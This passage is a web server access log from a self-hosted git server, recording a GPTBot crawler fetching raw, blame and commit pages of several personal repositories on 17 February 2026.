"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:14:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:14:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11717] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11748] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692345] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429930] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508435] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498800] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" -[17/Feb/2026:14:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" -[17/Feb/2026:14:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:14:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" -[17/Feb/2026:14:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" -[17/Feb/2026:14:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13328] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:14:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" -[17/Feb/2026:14:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" -[17/Feb/2026:14:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" -[17/Feb/2026:14:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" -[17/Feb/2026:14:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641759] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699385] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" -[17/Feb/2026:14:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15823] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" -[17/Feb/2026:14:08:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:14:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/" -[17/Feb/2026:14:08:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:14:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/" -[17/Feb/2026:14:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10968] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" -[17/Feb/2026:14:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" -[17/Feb/2026:14:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" -[17/Feb/2026:14:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" -[17/Feb/2026:14:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" -[17/Feb/2026:14:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10112] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:14:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" -[17/Feb/2026:14:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:14:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:14:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" -[17/Feb/2026:14:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main" -[17/Feb/2026:14:08:53 +0000] - 200 200 